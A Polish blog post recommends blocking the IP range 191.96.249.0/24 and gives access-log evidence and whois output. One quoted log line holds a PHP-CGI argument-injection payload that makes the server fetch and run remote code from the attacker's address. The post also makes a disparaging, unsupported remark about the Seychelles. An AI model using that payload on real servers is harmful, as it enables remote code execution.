Seszele – obok Ukrainy, Rosji i Chin – są najwyraźniej rajem dla internetowych włamywaczy. Jeśli nie prowadzisz działalności gospodarczej, która obejmuje zasięgiem cały świat, rozważ zablokowanie na firewallu poniższych adresów IP.
Do zablokowania: 191.96.249.0/24
Maszyna pod tym adresem IP regularnie skanuje witrynę pod kątem niezabezpieczonych skryptów i PHPMyAdmina.
Dowód:
191.96.249.97 - - [14/Mar/2017:21:18:05 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [16/Mar/2017:00:21:43 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [16/Mar/2017:21:45:57 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [18/Mar/2017:09:55:44 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [19/Mar/2017:00:49:48 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [20/Mar/2017:11:01:09 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [20/Mar/2017:22:02:05 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [21/Mar/2017:22:31:45 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-" 191.96.249.97 - - [23/Mar/2017:00:02:44 +0100] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\x22\x22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n HTTP/1.1" 404 7970 "-" "-" "-"
Poziom zagrożenia: niski
Zalecana akcja: zablokować na firewallu cały zakres adresów IP z puli od 191.96.249.1 do 191.96.249.255.
Do kogo należy adres 191.96.249.97?
Łatwo sprawdzić z użyciem polecenia whois, że adres należy do większej puli 191.96.249.0/24, którą zarządza firma na Seszelach:
$ whois 191.96.249.97 % LACNIC resource: whois.lacnic.net % 2017-03-29 07:11:28 (BRT -03:00) inetnum: 191.96.249/24 status: reallocated owner: Dmzhost Limited ownerid: SC-DMLI1-LACNIC responsible: JUPITER 25 LIMITED address: Francis Rachel Street, , Suite 1, Second Floor address: - Victoria - country: SC phone: +248 371 23801010 [] owner-c: CHP23 tech-c: CHP23 abuse-c: CHP23 created: 20151217 changed: 20160423 inetnum-up: 191.96/16 nic-hdl: CHP23 person: CRS P e-mail: abuse@DMZHOST.CO address: Suite 4 Second Floor, , address: - Victoria - country: SC /Seszele - red./ phone: +248 37123801010 [] created: 20160423 changed: 20160522
Co się stanie po zablokowaniu?
Wszystkie urządzenia pod adresami IP 191.96.249.1, 191.96.249.2, …, 191.96.249.255 przestaną widzieć naszą maszynę.
Oznacza to, że nie wejdą na naszą stronę WWW i nie połączą się z serwerem plików. Ale jeśli będą mieli do nas sprawę, zawsze mogą zadzwonić lub napisać e-mail (i z pewnością im na tym zależy… 😉
Dlaczego warto zablokować całą pulę adresów?
W tym konkretnym przypadku adresy IP należą do firmy zarejestrowanej na Seszelach, czyli kraju położonego na krańcu cywilizowanego świata. Przy takiej odległości policja nie ruszy nawet palcem, jeśli nie będzie miała do czynienia z międzynarodową sprawą kryminalną.
Dlatego włamywacz może czuć się bezkarnie.
Dlatego też warto zawczasu utrudnić mu pracę – i zablokować go na firewallu.
